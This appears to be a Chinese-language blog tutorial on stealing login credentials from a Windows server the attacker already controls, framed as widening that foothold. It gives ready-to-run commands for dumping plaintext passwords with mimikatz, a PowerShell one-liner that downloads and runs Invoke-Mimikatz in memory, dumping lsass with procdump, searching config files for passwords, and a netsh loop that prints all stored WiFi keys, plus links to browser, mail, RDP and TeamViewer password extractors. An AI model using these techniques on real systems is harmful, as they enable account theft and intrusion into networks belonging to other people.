Windows下登入憑證竊取技巧
拿到一臺Windows伺服器許可權,收集各種登入憑證以便擴大戰果。本篇分享幾個竊取Windows登入憑證的技巧和工具。
1、Windows 本地密碼Hash
Windows的系統密碼hash預設情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系統下hash密碼格式使用者名稱稱:RID:LM-HASH值:NT-HASH值。
例如:
Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040 使用者名稱稱為:Administrator RID為:500 LM-HASH值為:AF01DF70036EBACFAAD3B435B51404EE NT-HASH值為:44F077E27F6FEF69E7BD834C7242B040
破解方式一:hash線上破解網站:
https://www.objectif-securite.ch/ophcrack http://cmd5.com
破解方式二:mimikatz
Github地址:https://github.com/gentilkiwi/mimikatz
mimikatz使用起來也非常簡單,提取Windows系統的明文密碼只需兩行命令:
privilege::debug
sekurlsa::logonpasswords
破解方式三:wce
wce的常用引數使用說明如下: 引數解釋: -l 列出登入的會話和NTLM憑據(預設值)-s 修改當前登入會話的NTLM憑據 引數:<使用者名稱>:<域名>:<LM雜湊>:<NT雜湊> -w 通過摘要式認證快取一個明文的密碼
破解方式四:Powershell+mimikatz
直接利用poweshell來呼叫mimikatz抓取系統內的明文密碼。
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
破解方式五:prodump+mimikatz
procdump是微軟官方提供的一個小工具
微軟官方下載地址:https://technet.microsoft.com/en-us/sysinternals/dd996900
# 將工具拷貝到目標機器上執行如下命令(需要管理員許可權,我選擇的版本是64位) procdump.exe -accepteula -ma lsass.exe lsass.dmp # 將生成的記憶體dump檔案拷貝到mimikatz同目錄下,雙擊開啟mimikatz執行情況如圖: mimikatz # sekurlsa::minidump lsass.dmp # Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords full
2、抓取瀏覽器密碼
很多瀏覽器都提供了記住密碼的功能,使用者在登入一些網站的時候會選擇記住密碼。
LaZagne:提取瀏覽器所儲存的密碼
github專案地址:https://github.com/AlessandroZ/LaZagne
3、服務端明文密碼
在一些配置檔案或日誌裡,明文記錄著敏感的密碼資訊,如web.config、config.ini等檔案,可通過手動翻查敏感目錄,也可以通過findstr命令來查詢敏感檔案和內容。
findstr /i /s "password" *.config findstr /i /s "password" *.ini findstr /i /s "password" *.xml
4、第三方運維工具託管密碼
常見的有Linux運維工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,遠控軟體:Teamviewer、向日葵、VNC等。
xshell 密碼解密工具:https://github.com/dzxs/Xdecrypt
提取WinSCP,PuTTY等儲存的會話資訊:https://github.com/Arvanaghi/SessionGopher
從記憶體中提權TeamViewer密碼的工具:https://github.com/attackercan/teamviewer-dumper
星號檢視器—-一鍵破解星號密碼
5、檢視電腦wifi密碼
# 檢視電腦連線過的所有wifi netsh wlan show profiles # 檢視wifi訊號為Aaron的密碼 netsh wlan show profiles name="Aaron" key=clear # CMD一鍵獲取 所有連線過的WIFI密碼 for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
6、Windows密碼提取工具合集
各種Windows程式的免費密碼恢復工具,包括各種瀏覽器、郵箱、Windows網路密碼、無線網路金鑰。
IE瀏覽器提取密碼工具:https://www.nirsoft.net/toolsdownload/iepv.zip
Firefox 瀏覽器密碼提取工具:https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip
Chrome 瀏覽器密碼提取工具:https://www.nirsoft.net/toolsdownload/chromepass.zip
SVN密碼解密器:http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip
郵箱密碼提取工具:https://www.nirsoft.net/toolsdownload/mailpv.zip
提取.rdp檔案中儲存的密碼:https://www.nirsoft.net/toolsdownload/rdpv.zip
MSSQL憑據密碼獲取工具:http://www.zcgonvh.com/post/mssql_credential_pwddump.html